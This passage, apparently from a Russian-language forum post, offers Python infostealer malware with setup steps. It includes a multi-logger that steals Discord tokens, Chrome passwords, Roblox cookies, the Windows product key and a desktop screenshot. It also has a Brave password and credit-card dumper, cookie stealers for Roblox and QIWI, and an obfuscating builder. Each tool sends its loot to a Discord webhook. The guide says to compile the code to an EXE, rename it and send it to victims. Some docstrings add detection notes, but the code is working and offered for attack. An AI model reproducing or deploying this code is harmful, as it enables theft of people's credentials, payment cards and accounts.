        keys = subprocess.check_output('wmic path softwarelicensingservice get OA3xOriginalProductKey').decode().split('\n')[1].strip()
        types = subprocess.check_output('wmic os get Caption').decode().split('\n')[1].strip()
    except:
        pass

    """steal victim's .roblosecurity cookie"""
    cookie = [".ROBLOSECURITY"]
    cookies = []
    # 2000 is used below as the chunk length when splitting the cookie text.
    limit = 2000

    """chrome installation => list cookies from this location"""
    # File indicator: the cookie databases of Chrome and Firefox are opened by a
    # process that is neither browser.
    try:
        cookies.extend(list(steal.chrome()))
    except:
        pass

    """firefox installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.firefox()))
    except:
        pass

    """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
    try:
        for y in cookie:
            send = str([str(x) for x in cookies if y in str(x)])
            chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
            for z in chunks:
                roblox = f'```' + f'{z}' + '```'
    except:
        pass

    """attempt to send all recieved data to our specified webhook"""
    # Network indicator: a single upload to the configured webhook URL carrying an
    # embed plus the zip attachment. Egress filtering or alerting on webhook
    # endpoints contacted by non-chat processes covers this step.
    try:
        embed = Embed(title='Aditional Features',description='a victim\'s data was extracted, here\'s the details:',color=0x2f3136,timestamp='now')
        embed.add_field("windows key:",f"user => {usr}\ntype => {types}\nkey => {keys}")
        embed.add_field("roblosecurity:",roblox)
        embed.add_field("tokens:",message)
        embed.add_field("hostname:",f"{hostname}")
    except:
        pass
    try:
        hook.send(embed=embed, file=passwords)
    except:
        pass

    """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
    # Forensics: the files are removed with the shell 'del' command, not overwritten,
    # so file-creation/deletion telemetry and filesystem journal records of the three
    # names remain available to responders after the run.
    try:
        subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
        subprocess.os.system(r'del C:\ProgramData\passwords.zip')
        subprocess.os.system(r'del C:\ProgramData\passwords.txt')
    except:
        pass


beamed()

Browser Password Stealer​

sudo apt install python3 && python3-pip
pip3 install pypiwin32 pycryptodome win32crypt Crypto shutil
python Brave.py


Brave.py​


Python:
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime



FileName = 116444736000000000
NanoSeconds = 10000000


def ConvertDate(ft):
    utc = datetime.utcfromtimestamp(((10 * int(ft)) - FileName) / NanoSeconds)
    return utc.strftime('%Y-%m-%d %H:%M:%S')


def get_master_key():
    '''
    Return the key used to decrypt this user's saved Brave credential blobs.

    Reads the profile's "Local State" JSON, base64-decodes
    os_crypt.encrypted_key, drops the first 5 bytes (presumably a fixed
    header) and passes the remainder to win32crypt.CryptUnprotectData;
    element [1] of that result is returned. The process exits if the file
    cannot be read or parsed.

    Detection: the pairing to look for is a non-browser process opening
    "User Data\\Local State" and then calling CryptUnprotectData. The DPAPI
    call normally succeeds only inside the owning user's session, so this
    activity appears under the victim's own account rather than as a
    privilege escalation.
    '''
    try:
     with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State',
              "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    except:
        # Any failure to read or parse the file ends the whole process.
        exit()
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    '''
    Decrypt one stored blob with master_key and return it as text.

    Bytes 3..14 of buff are used as the IV and everything from byte 15 on
    as the payload; the cipher comes from generate_cipher(). The last 16
    bytes of the decrypted output are discarded (presumably the
    authentication tag) and never verified, so the result carries no
    integrity guarantee.

    On any exception the literal string "Chrome < 80" is returned instead
    of raising; that constant is a convenient static signature for samples
    derived from this code.
    '''
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass
    except Exception as e:
        return "Chrome < 80"


def get_password():
    '''
    Print every saved login from the Brave profile's "Login Data" store.

    The live database is copied to "Loginvault.db" in the current working
    directory, queried through sqlite3, each password_value is passed to
    decrypt_password(), and the copy is removed afterwards.

    Detection: a non-browser process reading
    "Brave-Browser\\User Data\\default\\Login Data", and the short-lived
    file "Loginvault.db" appearing in that process's working directory.
    Output goes to stdout only; this function performs no network activity.
    '''
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Login Data'
    try:
        # Working on a copy means the browser's own handle on the database is not touched.
        shutil.copy2(login_db,
                     "Loginvault.db")
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            if username != "" or decrypted_password != "":
                print(
                    "URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 10 + "\n")
    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        # Staging copy is deleted; file-creation/deletion telemetry still records the name.
        os.remove("Loginvault.db")
    except Exception as e:
        pass


def get_credit_cards():
    '''
    Print the rows of the credit_cards table from the Brave profile's "Web Data" store.

    The live database is copied to "CCvault.db" in the current working
    directory and queried with SELECT *; columns 1, 2, 3 and 4 of each row
    are used as cardholder name, expiry month, expiry year and the
    encrypted number, which is passed to decrypt_password(). The copy is
    removed afterwards.

    Detection: a non-browser process reading
    "Brave-Browser\\User Data\\default\\Web Data", and the short-lived file
    "CCvault.db" in that process's working directory.
    Mitigation: not storing payment cards in the browser autofill store
    removes the data this function targets.
    '''
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Web Data'
    try:
        shutil.copy2(login_db,
                     "CCvault.db")
                    
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
            print(
                "Name in Card: " + username + "\nNumber: " + decrypted_password + "\nExpire Month: " + str(
                    expire_mon) + "\nExpire Year: " + str(expire_year) + "\n" + "*" * 10 + "\n")

    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        # Staging copy is deleted; file-creation/deletion telemetry still records the name.
        os.remove("CCvault.db")
    except Exception as e:
        pass


def get_bookmarks():
    bookmarks_location = os.environ[
                             'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Bookmarks'
    with open(bookmarks_location) as f:
        data = json.load(f)
        bookmarks_list = data["roots"]["bookmark_bar"]["children"]
        
        for i in range(len(bookmarks_list)):
            print(f"Name: {bookmarks_list[i]['name']}\n"
            f"Added on: {ConvertDate(bookmarks_list[i]['date_added'])}\n")


while True:

        get_password()
        get_credit_cards()
        get_bookmarks()

Multi-logger​


sudo apt install python3 && python3-pip
pip3 install dhooks pycryptodome requests psutil browser_cookie3 cryptography


multi-logger.py​

Python:
## Scan for the regex [\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}
def Yoink(Directory):
    Directory += '\\Local Storage\\leveldb'

    Tokens = []

    for FileName in os.listdir(Directory):
        if not FileName.endswith('.log') and not FileName.endswith('.ldb'):
            continue

        for line in [x.strip() for x in open(f'{Directory}\\{FileName}', errors='ignore').readlines() if x.strip()]:
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                for Token in re.findall(regex, line):
                    Tokens.append(Token)

    return Tokens


## Wipe the temp file
def Wipe():
    if os.path.exists(roaming + "temp.txt"):
      output2 = open(roaming + "temp.txt", "w")
      output2.write("")
      output2.close()
    else:
      pass


## Search Directorys for Token regex if exists
for Discord, Directory in Directories.items():
    if os.path.exists(Directory):
        Tokens = Yoink(Directory)
    if len(Tokens) > 0:
        for Token in Tokens:
            realshit = f"{Token}\n"


cpufreq = psutil.cpu_freq()
svmem = psutil.virtual_memory()
partitions = psutil.disk_partitions()
disk_io = psutil.disk_io_counters()
net_io = psutil.net_io_counters()

partitions = psutil.disk_partitions()
for partition in partitions:
    try:
        partition_usage = psutil.disk_usage(partition.mountpoint)
    except PermissionError:
        continue





requests.post(url, data=json.dumps({ "embeds": [ { "title": f"Someone Runs Program! - {host}", "color": 8781568 }, { "color": 7506394, "fields": [ { "name": "GeoLocation", "value": f"Using VPN?: {proxy}\nLocal IP: {localip}\nPublic IP: {publicip}\nMAC Adress: {mac}\n\nCountry: {country} | {callcode} | {timezone}\nregion: {region}\nCity: {city} | {postal}\nCurrency: {currency}\n\n\n\n" } ] }, { "fields": [ { "name": "System Information", "value": f"System: {uname.system}\nNode: {uname.node}\nMachine: {uname.machine}\nProcessor: {uname.processor}\n\nBoot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}" } ] }, { "color": 15109662, "fields": [ { "name": "CPU Information", "value": f"Psychical cores: {psutil.cpu_count(logical=False)}\nTotal Cores: {psutil.cpu_count(logical=True)}\n\nMax Frequency: {cpufreq.max:.2f}Mhz\nMin Frequency: {cpufreq.min:.2f}Mhz\n\nTotal CPU usage: {psutil.cpu_percent()}\n" }, { "name": "Nemory Information", "value": f"Total: {scale(svmem.total)}\nAvailable: {scale(svmem.available)}\nUsed: {scale(svmem.used)}\nPercentage: {svmem.percent}%" }, { "name": "Disk Information", "value": f"Total Size: {scale(partition_usage.total)}\nUsed: {scale(partition_usage.used)}\nFree: {scale(partition_usage.free)}\nPercentage: {partition_usage.percent}%\n\nTotal read: {scale(disk_io.read_bytes)}\nTotal write: {scale(disk_io.write_bytes)}" }, { "name": "Network Information", "value": f"Total Sent: {scale(net_io.bytes_sent)}\")\nTotal Received: {scale(net_io.bytes_recv)}" } ] }, { "color": 7440378, "fields": [ { "name": "Discord information", "value": f"Token: {realshit}" } ] } ] }), headers={"Content-Type": "application/json"})

DBP = r'Google\Chrome\User Data\Default\Login Data'
ADP = os.environ['LOCALAPPDATA']


def sniff(path):
    path += '\\Local Storage\\leveldb'

    tokens = []
    try:
        for file_name in os.listdir(path):
            if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
                continue

            for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
                for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                    for token in re.findall(regex, line):
                        tokens.append(token)
        return tokens
    except:
        pass


def encrypt(cipher, plaintext, nonce):
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)


def decrypt(cipher, ciphertext, nonce):
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)


def rcipher(key):
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    return cipher


def dpapi(encrypted):
    import ctypes
    import ctypes.wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result


def localdata():
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]


def decryptions(encrypted_txt):
    encoded_key = localdata()
    encrypted_key = base64.b64decode(encoded_key.encode())
    encrypted_key = encrypted_key[5:]
    key = dpapi(encrypted_key)
    nonce = encrypted_txt[3:15]
    cipher = rcipher(key)
    return decrypt(cipher, encrypted_txt[15:], nonce)


class chrome:
    def __init__(self):
        self.passwordList = []

    def chromedb(self):
        _full_path = os.path.join(ADP, DBP)
        _temp_path = os.path.join(ADP, 'sqlite_file')
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        shutil.copyfile(_full_path, _temp_path)
        self.pwsd(_temp_path)
    def pwsd(self, db_file):
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.cdecrypt(row[2])
            _info = '[==================]\nhostname => : %s\nlogin => : %s\nvalue => : %s\n[==================]\n\n' % (host, name, value)
            self.passwordList.append(_info)
        conn.close()
        os.remove(db_file)

    def cdecrypt(self, encrypted_txt):
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = decryptions(encrypted_txt)
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            pass

    def saved(self):
        try:
            with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
                f.writelines(self.passwordList)
        except WindowsError:
            return None


if __name__ == "__main__":
    main = chrome()
    try:
        main.chromedb()
    except:
        pass
    main.saved()


# webhook functionality => collect rest of specified data, send it to our webhook


def beamed():
    hook = Webhook(url)
    try:
        hostname = requests.get("https://api.ipify.org").text
    except:
        pass


    local = os.getenv('LOCALAPPDATA')
    roaming = os.getenv('APPDATA')
    paths = {
        'Discord': roaming + '\\Discord',
        'Discord Canary': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
    }

    message = '\n'
    for platform, path in paths.items():
        if not os.path.exists(path):
            continue

        message += '```'

        tokens = sniff(path)

        if len(tokens) > 0:
            for token in tokens:
                message += f'{token}\n'
        else:
            pass

        message += '```'
    

    """screenshot victim's desktop"""
    try:
        screenshot = image.grab()
        screenshot.save(os.getenv('ProgramData') +r'\screenshot.jpg')
        screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
        screenshot.close()
    except:
        pass

    """gather our .zip variables"""
    try:
        zname = r'C:\ProgramData\passwords.zip'
        newzip = zipfile.ZipFile(zname, 'w')
        newzip.write(r'C:\ProgramData\passwords.txt')
        newzip.close()
        passwords = File(r'C:\ProgramData\passwords.zip')
    except:
        pass
    
    """gather our windows product key variables"""
    try:
        usr = os.getenv("UserName")
        keys = subprocess.check_output('wmic path softwarelicensingservice get OA3xOriginalProductKey').decode().split('\n')[1].strip()
        types = subprocess.check_output('wmic os get Caption').decode().split('\n')[1].strip()
    except:
        pass

    """steal victim's .roblosecurity cookie"""
    cookie = [".ROBLOSECURITY"]
    cookies = []
    limit = 2000

    """chrome installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.chrome()))
    except:
        pass

    """firefox installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.firefox()))
    except:
        pass

    """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
    try:
        for y in cookie:
            send = str([str(x) for x in cookies if y in str(x)])
            chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
            for z in chunks:
                roblox = f'```' + f'{z}' + '```'
    except:
        pass

    """attempt to send all recieved data to our specified webhook"""
    try:
        embed = Embed(title='Aditional Features',description='a victim\'s data was extracted, here\'s the details:',color=0x2f3136,timestamp='now')
        embed.add_field("windows key:",f"user => {usr}\ntype => {types}\nkey => {keys}")
        embed.add_field("roblosecurity:",roblox)
        embed.add_field("tokens:",message)
        embed.add_field("hostname:",f"{hostname}")
    except:
        pass
    try:
        hook.send(embed=embed, file=passwords)
    except:
        pass

    """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
    try:
        subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
        subprocess.os.system(r'del C:\ProgramData\passwords.zip')
        subprocess.os.system(r'del C:\ProgramData\passwords.txt')
    except:
        pass


beamed()
 

Cookie Stealer​

Cookie Searer, вероятно, является одним из лучших инструментом кражи куки, он не раздувается яркими вставками, изображениями или функциями, а вместо этого стремится быть чрезвычайно быстрым и маленьким, и красть из всех браузеров

Один чистый тестовый файл (без спама Webhook)
Кравлер для браузеров (так что он крадет из действительно из каждого браузера)
Простые и быстро


Использование:​


1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите Discord Webhook и поместите в webhook = "" Введите свой webhook между кавычками.
3) Запустите команды для создания EXE, переименуйте и отправьте


sudo apt install python3 && python3-pip
pip3 install pyinstaller
pyinstaller --clean --onefile --key MOST_SECURE_KEY main.py


main.py

Код:
webhook = "" # WEBHOOK

import os
import json
import base64
import shutil
import sqlite3
import io
import requests
import traceback
import subprocess

from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES

def safe(func):
    def wrapper(*args, **kwargs):
        try:
            func(*args, **kwargs)
        except Exception:
            pass
    return wrapper

class CookieLogger:

    appdata = os.getenv('APPDATA')
    localappdata = os.getenv('LOCALAPPDATA')

    def __init__(self):
        browsers = self.findBrowsers()

        cookies = []
        for browser in browsers:
            try:
                cookies += self.getCookie(browser[0], browser[1])
            except Exception:
                pass

        try:
            cookies.append('\n'.join(line for line in subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000, shell=True).decode().strip().splitlines() if line.strip()))
        except Exception:
            pass

        requests.post(webhook, files = {"cookies.txt": "\n\n".join(list(set(cookies)))})
 
    @safe
    def findBrowsers(self):
        found = []

        for root in [self.appdata, self.localappdata]:
            for directory in os.listdir(root):
                try:
                    for _root, _, _ in os.walk(os.path.join(root, directory)):
                        for file in os.listdir(_root):
                            if file == "Local State":
                                if "Default" in os.listdir(_root):
                                    found.append([_root, True])
                                else:
                                    found.append([_root, False])
                except Exception:
                    pass
   
        return found

    @safe
    def getMasterKey(self, browserPath):
        with open(os.path.join(browserPath, "Local State"), "r", encoding = "utf8") as f:
            localState = json.loads(f.read())
   
        masterKey = base64.b64decode(localState["os_crypt"]["encrypted_key"])
        truncatedMasterKey = masterKey[5:]

        return CryptUnprotectData(truncatedMasterKey, None, None, None, 0)[1]

    @safe
    def decryptCookie(self, cookie, masterKey):
        iv = cookie[3:15]
        encryptedValue = cookie[15:]

        cipher = AES.new(masterKey, AES.MODE_GCM, iv)
        decryptedValue = cipher.decrypt(encryptedValue)

        return decryptedValue[:-16].decode()

    @safe
    def getCookie(self, browserPath, isProfiled):

        cookiesFound = []
        profiles = ["Default"]
        try:
            masterKey = self.getMasterKey(browserPath)
        except Exception:
            traceback.print_exc()
            return cookiesFound

        if isProfiled:
            for directory in os.listdir(browserPath):
                if directory.startswith("Profile"):
                    profiles.append(directory)
   
        if not isProfiled:
            if "Network" in os.listdir(browserPath):
                cookiePath = os.path.join(browserPath, "Network", "Cookies")
            else:
                cookiePath = os.path.join(browserPath, "Cookies")
       
            shutil.copy2(cookiePath, "temp.db")
            connection = sqlite3.connect("temp.db")
            cursor = connection.cursor()

            cursor.execute("SELECT encrypted_value FROM cookies")
            for cookie in cursor.fetchall():
                if cookie[0]:
                    decrypted = self.decryptCookie(cookie[0], masterKey)

                    if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                        cookiesFound.append(decrypted)
           
            connection.close()
            os.remove("temp.db")
   
        else:
            for profile in profiles:
                if "Network" in os.listdir(os.path.join(browserPath, profile)):
                    cookiePath = os.path.join(browserPath, profile, "Network", "Cookies")
                else:
                    cookiePath = os.path.join(browserPath, profile, "Cookies")

                shutil.copy2(cookiePath, "temp.db")
                connection = sqlite3.connect("temp.db")
                cursor = connection.cursor()

                cursor.execute("SELECT encrypted_value FROM cookies")
                for cookie in cursor.fetchall():
                    if cookie[0]:
                        decrypted = self.decryptCookie(cookie[0], masterKey)

                        if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                            cookiesFound.append(decrypted)
           
                connection.close()
                os.remove("temp.db")

        return cookiesFound

if __name__ == "__main__":
    CookieLogger()

Cookie и IP Stealer​

Python Searer умеет красть из 4 браузеров, точечно
Вместо QIWI.com вставьте свой сайт, смотря какие куки и ip вам нужны

Python:
import browser_cookie3
import requests
import threading


WebHook = "" # Input your webhook here


def MicrosoftEdge():
 
    try:
        cookies = browser_cookie3.chrome(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Edge",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass
 

def GoogleChrome():
    try:
        cookies = browser_cookie3.chrome(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Chrome",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass

def MozillaFirefox():
    try:
        cookies = browser_cookie3.firefox(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Firefox",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass

def Opera():
    try:
        cookies = browser_cookie3.opera(domain_name = "QIWI.com")
        cookies = str(cookies)
        cookie = cookies.split(".auth_=")[1].split(" for .QIWI.com/>")[0].strip()
        ip_address = requests.get("https://api.ipify.org/").text
        requests.post(WebHook, json = {
            "username" : "RED SKULL|COOK'ER",
            "avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
            "embeds": [{
                "title": "COOKIE FOUND|Browser : Opera",
                "description": f"```{cookie}```",
                "color": 16711680,
                "fields": [
                    {"name" : "Victim's IP", "value" : ip_address, "inline:": True}
                ],
                "footer": {
        "text": "Turbo",
        "icon_url": "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png"
      }        
}]})
    except:
        pass

browsers = [MicrosoftEdge, GoogleChrome, MozillaFirefox, Opera]

for v in browsers:
    threading.Thread(target = v).start()

Cookie Stealer Roblox​

С обфускацией кода

Использование:​


1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите Discord Webhook и поместите в webhook = "" Введите свой webhook между кавычками.
3) Запустите команды для создания EXE, переименуйте и отправьте


sudo apt install python3 && python3-pip
pip3 install pyinstaller browser_cookie3 requests
Через pyinstaller создаёте red_skull.exe


red_skull.py​


Python:
import os
import base64
import shutil
import marshal

os.system("python -m pip install pyinstaller pypiwin32 pycryptodome requests")
os.system("cls")

webhook = input("Paste your Webhook: ")
obfuscate = input("Obfuscate (Encrypt) the code? (Y/N): ")

id = base64.b64encode(os.urandom(16)).decode().replace("=","").replace("/","")

code = f"""
webhook = "{webhook}" # WEBHOOK HERE
import os
import json
import base64
import shutil
import sqlite3
import io
import requests
import traceback
import subprocess
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
def safe(func):
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            pass
    return wrapper
class CookieLogger:
    appdata = os.getenv('APPDATA')
    localappdata = os.getenv('LOCALAPPDATA')
    def __init__(self):
        browsers = self.findBrowsers()
        cookies = []
        for browser in browsers:
            try:
                cookies.append(self.getCookie(browser[0], browser[1]))
            except Exception:
                pass
        try:
            cookies.append(("Roblox App", ("None", '\\n'.join(line for line in subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000, shell=True).decode().strip().splitlines() if line.strip()))))
        except Exception:
            pass
   
        cookieDoc = ""
        for cookie in cookies:
            if cookie == None or not cookie[1]:
                continue
            for _cookie in cookie[1]:
                cookieDoc += f"Browser: {{cookie[0]}}\\nProfile: {{_cookie[0]}}\\nCookie: {{_cookie[1]}}\\n\\n"
        requests.post(webhook, files = {{"cookies.txt": cookieDoc}})
 
    @safe
    def findBrowsers(self):
        found = []
        for root in [self.appdata, self.localappdata]:
            for directory in os.listdir(root):
                try:
                    for _root, _, _ in os.walk(os.path.join(root, directory)):
                        for file in os.listdir(_root):
                            if file == "Local State":
                                if "Default" in os.listdir(_root):
                                    found.append([_root, True])
                                else:
                                    found.append([_root, False])
                except Exception:
                    pass
        return found
    @safe
    def getMasterKey(self, browserPath):
        with open(os.path.join(browserPath, "Local State"), "r", encoding = "utf8") as f:
            localState = json.loads(f.read())
   
        masterKey = base64.b64decode(localState["os_crypt"]["encrypted_key"])
        truncatedMasterKey = masterKey[5:]
        return CryptUnprotectData(truncatedMasterKey, None, None, None, 0)[1]
    @safe
    def decryptCookie(self, cookie, masterKey):
        iv = cookie[3:15]
        encryptedValue = cookie[15:]
        cipher = AES.new(masterKey, AES.MODE_GCM, iv)
        decryptedValue = cipher.decrypt(encryptedValue)
        return decryptedValue[:-16].decode()
    @safe
    def getCookie(self, browserPath, isProfiled):
        if browserPath.split("\\\\")[-1] == "User Data":
            browserName = browserPath.split("\\\\")[-2]
        else:
            browserName = browserPath.split("\\\\")[-1]
   
        cookiesFound = []
        profiles = ["Default"]
        try:
            masterKey = self.getMasterKey(browserPath)
        except Exception:
            traceback.print_exc()
            return cookiesFound
        if isProfiled:
            for directory in os.listdir(browserPath):
                if directory.startswith("Profile"):
                    profiles.append(directory)
   
        if not isProfiled:
            if "Network" in os.listdir(browserPath):
                cookiePath = os.path.join(browserPath, "Network", "Cookies")
            else:
                cookiePath = os.path.join(browserPath, "Cookies")
       
            shutil.copy2(cookiePath, "temp.db")
            connection = sqlite3.connect("temp.db")
            cursor = connection.cursor()
            cursor.execute("SELECT encrypted_value FROM cookies")
            for cookie in cursor.fetchall():
                if cookie[0]:
                    decrypted = self.decryptCookie(cookie[0], masterKey)
                    if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                        cookiesFound.append(("None", decrypted))
           
            connection.close()
            os.remove("temp.db")
   
        else:
            for profile in profiles:
                if "Network" in os.listdir(os.path.join(browserPath, profile)):
                    cookiePath = os.path.join(browserPath, profile, "Network", "Cookies")
                else:
                    cookiePath = os.path.join(browserPath, profile, "Cookies")
                shutil.copy2(cookiePath, "temp.db")
                connection = sqlite3.connect("temp.db")
                cursor = connection.cursor()
                cursor.execute("SELECT encrypted_value FROM cookies")
                for cookie in cursor.fetchall():
                    if cookie[0]:
                        decrypted = self.decryptCookie(cookie[0], masterKey)
                        if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                            cookiesFound.append((profile, decrypted))
           
                connection.close()
                os.remove("temp.db")
        return [browserName, cookiesFound]
if __name__ == "__main__":
    CookieLogger()
"""

if obfuscate.lower().startswith("Y"):
    newcode = f"""
